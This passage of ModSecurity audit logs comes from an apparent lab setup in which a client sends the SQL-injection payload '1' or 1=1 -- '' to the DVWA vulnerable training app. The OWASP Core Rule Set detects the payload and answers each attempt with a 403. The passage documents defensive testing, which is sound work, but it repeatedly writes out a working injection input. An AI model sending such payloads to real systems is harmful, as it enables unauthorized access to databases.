[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUUH8AAQEAABwQSCgAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUUH8AAQEAABwQSCgAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUUH8AAQEAABwQSCgAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUUH8AAQEAABwQSCgAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUUH8AAQEAABwQSCgAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":920,"p2":3837,"p3":0,"p4":0,"p5":124,"sr":46,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:39 --0400","transaction_id":"WRdUU38AAQEAABwQSCkAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1+--+%27&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUU38AAQEAABwQSCkAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUU38AAQEAABwQSCkAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUU38AAQEAABwQSCkAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUU38AAQEAABwQSCkAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUU38AAQEAABwQSCkAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":556,"p2":3522,"p3":0,"p4":0,"p5":3047,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:41 --0400","transaction_id":"WRdUVX8AAQEAABwQSCoAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1+--+%27&Submit=Submit HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":403,"headers":{"Content-Length":"315","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access /dvwa/vulnerabilities/sqli/\non this server.<br />\n</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 192.168.75.136 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]","Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"]","Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"]","Warning. Operator GE matched 5 at TX:inbound_anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUVX8AAQEAABwQSCoAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. 
detected SQLi using libinjection with fingerprint 's&1c' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1c found within ARGS:id: 1' or 1=1 -- '\"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUVX8AAQEAABwQSCoAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 's&1' [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf\"] [line \"68\"] [id \"942100\"] [rev \"1\"] [msg \"SQL Injection Attack Detected via libinjection\"] [data \"Matched Data: s&1 found within ARGS:id: 1' or 1=1 \"] [severity \"CRITICAL\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"1\"] [accuracy \"8\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-sqli\"] [tag \"OWASP_CRS/WEB_ATTACK/SQL_INJECTION\"] [tag \"WASCTC/WASC-19\"] [tag \"OWASP_TOP_10/A1\"] [tag \"OWASP_AppSensor/CIE1\"] [tag \"PCI/6.5.2\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUVX8AAQEAABwQSCoAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf\"] [line \"57\"] [id \"949110\"] [msg \"Inbound Anomaly Score Exceeded (Total Score: 13)\"] [severity \"CRITICAL\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-generic\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUVX8AAQEAABwQSCoAAAAD\"]","[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf\"] [line \"73\"] [id \"980130\"] [msg \"Inbound Anomaly Score Exceeded (Total Inbound Score: 13 - SQLI=10,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection\"] [tag \"event-correlation\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUVX8AAQEAABwQSCoAAAAD\"]"],"action":{"intercepted":true,"phase":2,"message":"Operator GE matched 5 at TX:anomaly_score."},"stopwatch":{"p1":466,"p2":3121,"p3":0,"p4":0,"p5":188,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:44 --0400","transaction_id":"WRdUWH8AAQEAABwQSCsAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
[file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"192.168.75.136\"] [uri \"/dvwa/vulnerabilities/sqli/\"] [unique_id \"WRdUWH8AAQEAABwQSCsAAAAD\"]"],"handler":"application/x-httpd-php","stopwatch":{"p1":424,"p2":1804,"p3":113,"p4":240,"p5":94,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:14:45:44 --0400","transaction_id":"WRdUWH8AAQEAABwQSCwAAAAD","remote_address":"192.168.75.181","remote_port":47262,"local_address":"192.168.75.136","local_port":80},"request":{"request_line":"GET /dvwa/vulnerabilities/sqli/ HTTP/1.1","headers":{"Host":"192.168.75.136","User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://192.168.75.136/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit","Cookie":"security=low; PHPSESSID=j4ho0gge83rg7kdh8jf6n2g3p4","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":302,"headers":{"Expires":"Thu, 19 Nov 1981 08:52:00 GMT","Cache-Control":"no-store, no-cache, must-revalidate, post-check=0, pre-check=0","Pragma":"no-cache","Location":"../../login.php","Content-Length":"0","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=UTF-8"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"192.168.75.136\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 192.168.75.181] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. 
